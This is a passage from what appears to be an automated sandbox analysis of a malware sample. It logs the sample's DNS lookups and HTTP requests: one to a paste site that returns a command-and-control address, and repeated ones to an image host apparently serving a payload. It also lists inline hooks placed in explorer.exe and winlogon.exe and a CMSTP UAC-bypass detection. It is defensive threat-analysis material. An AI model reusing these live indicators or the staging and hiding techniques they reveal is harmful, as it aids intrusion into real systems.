                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.943404913 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249135017 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249275923 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249350071 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249560118 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249596119 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250035048 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250083923 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250179052 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250376940 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250406027 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.142594099 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.143913984 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.143959999 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.523911953 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.523981094 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524043083 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524547100 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524569988 CEST44352510162.19.58.157192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Oct 15, 2024 11:20:27.153187037 CEST  64576        53         192.168.2.7  1.1.1.1
Oct 15, 2024 11:20:27.162574053 CEST  53           64576      1.1.1.1      192.168.2.7
Oct 15, 2024 11:20:33.351094961 CEST  59173        53         192.168.2.7  1.1.1.1
Oct 15, 2024 11:20:33.358406067 CEST  53           59173      1.1.1.1      192.168.2.7
Oct 15, 2024 11:20:40.308948040 CEST  53           56421      1.1.1.1      192.168.2.7
Oct 15, 2024 11:20:41.366416931 CEST  60527        53         192.168.2.7  1.1.1.1
Oct 15, 2024 11:20:41.374453068 CEST  53           60527      1.1.1.1      192.168.2.7
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name       Type            Class        DNS over HTTPS
Oct 15, 2024 11:20:27.153187037 CEST  192.168.2.7  1.1.1.1  0x6878    Standard query (0)  rentry.co  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:33.351094961 CEST  192.168.2.7  1.1.1.1  0x3237    Standard query (0)  i.ibb.co   A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.366416931 CEST  192.168.2.7  1.1.1.1  0x5eb9    Standard query (0)  i.ibb.co   A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                         CName  Address        Type            Class        DNS over HTTPS
Oct 15, 2024 11:20:25.756997108 CEST  1.1.1.1    192.168.2.7  0xecf1    No error (0)  windowsupdatebg.s.llnwi.net         178.79.208.1   A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:25.756997108 CEST  1.1.1.1    192.168.2.7  0xecf1    No error (0)  windowsupdatebg.s.llnwi.net         87.248.202.1   A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:27.162574053 CEST  1.1.1.1    192.168.2.7  0x6878    No error (0)  rentry.co                           104.26.2.16    A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:27.162574053 CEST  1.1.1.1    192.168.2.7  0x6878    No error (0)  rentry.co                           172.67.75.40   A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:27.162574053 CEST  1.1.1.1    192.168.2.7  0x6878    No error (0)  rentry.co                           104.26.3.16    A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:33.358406067 CEST  1.1.1.1    192.168.2.7  0x3237    No error (0)  i.ibb.co                            169.197.85.95  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.157  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.160  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.158  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.159  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.161  A (IP address)  IN (0x0001)  false
Oct 15, 2024 11:20:41.374453068 CEST  1.1.1.1    192.168.2.7  0x5eb9    No error (0)  i.ibb.co                            162.19.58.156  A (IP address)  IN (0x0001)  false
• rentry.co
• i.ibb.co
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49731        104.26.2.16     443               6880  C:\Users\user\Desktop\wzcsapi.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:20:27 UTC  68                 OUT        GET /tranr/raw HTTP/1.1
Host: rentry.co
Connection: Keep-Alive
2024-10-15 09:20:28 UTC  700                IN         HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 09:20:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 20
Connection: close
vary: Origin
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
Cache-Control: Vary
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q39fQpjZVqjwk7n458OT06lC%2FXNeAi%2BdIOM%2Bi4sk3CVBIuMjw9q%2F%2FXPnS29tyFuAF6ohH1gndNf3FOWvVx1P4JFVqENzpZN8gzcdLBcITNq4SwlkSmwCeVYmtw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d2ebbbf2a576b37-DFW
2024-10-15 09:20:28 UTC  20                 IN         Data Raw: 31 34 37 2e 31 38 35 2e 32 32 31 2e 31 38 3a 33 36 35 33 38
Data Ascii: 147.185.221.18:36538


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49767        169.197.85.95   443               6880  C:\Users\user\Desktop\wzcsapi.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:20:34 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49773        169.197.85.95   443               6880  C:\Users\user\Desktop\wzcsapi.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:20:35 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49790        169.197.85.95   443               6880  C:\Users\user\Desktop\wzcsapi.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:20:38 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49796        169.197.85.95   443               6880  C:\Users\user\Desktop\wzcsapi.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:20:39 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 52287 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:42 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 52294 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:43 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 52317 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:46 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 52323 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:47 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 52344 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:51 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 52350 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:52 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 52368 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:55 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 52375 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:20:56 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 52397 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:00 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 52403 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:01 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 52419 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:05 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 52430 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:06 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 52447 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:09 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 52458 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:10 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 52474 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:14 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 52481 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:15 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 52484 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:19 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 52485 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:20 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 52486 | 162.19.58.157 | 443 | 6880 | C:\Users\user\Desktop\wzcsapi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 09:21:23 UTC | 75 | OUT | GET /Dwrj41N/Image.png HTTP/1.1
Host: i.ibb.co
Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.752487162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:25 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.752489162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:28 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              26192.168.2.752490162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:29 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              27192.168.2.752491162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:33 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              28192.168.2.752492162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:34 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              29192.168.2.752493162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:37 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              30192.168.2.752495162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:52 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              31192.168.2.752496162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:55 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              32192.168.2.752497162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:01 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              33192.168.2.752498162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:04 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              34192.168.2.752499162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:06 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              35192.168.2.752500162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:09 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              36192.168.2.752501162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:10 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              37192.168.2.752502162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:13 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              38192.168.2.752503162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:14 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              39192.168.2.752504162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:23 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              40192.168.2.752505162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:24 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              41192.168.2.752506162.19.58.157443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:22:27 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port
42          192.168.2.7  52507        162.19.58.157   443

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:22:34 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
                                                       Host: i.ibb.co
                                                       Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port
43          192.168.2.7  52509        162.19.58.157   443

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:22:37 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
                                                       Host: i.ibb.co
                                                       Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port
44          192.168.2.7  52510        162.19.58.157   443

Timestamp                Bytes transferred  Direction  Data
2024-10-15 09:22:39 UTC  75                 OUT        GET /Dwrj41N/Image.png HTTP/1.1
                                                       Host: i.ibb.co
                                                       Connection: Keep-Alive


Code Manipulations

Function Name                  Hook Type  Active in Processes
ZwEnumerateKey                 INLINE     explorer.exe, winlogon.exe
NtQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
ZwResumeThread                 INLINE     explorer.exe, winlogon.exe
NtDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
ZwDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
NtEnumerateKey                 INLINE     explorer.exe, winlogon.exe
NtQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe
ZwEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
ZwQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
NtResumeThread                 INLINE     explorer.exe, winlogon.exe
RtlGetNativeSystemInformation  INLINE     explorer.exe, winlogon.exe
NtQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
NtEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
ZwQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe

Function Name                  Hook Type  New Data
ZwEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation  INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Function Name                  Hook Type  New Data
ZwEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation  INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID: 1
Start time: 05:20:17
Start date: 15/10/2024
Path: C:\Users\user\Desktop\r8k29DBraE.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\r8k29DBraE.exe"
Imagebase: 0x2616cab0000
File size: 571'904 bytes
MD5 hash: DC50BAFF9F1BAB10F1EBC24E0D77AFC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 05:20:20
Start date: 15/10/2024
Path: C:\Users\user\Desktop\wzcsapi.exe
Wow64 process (32bit): false
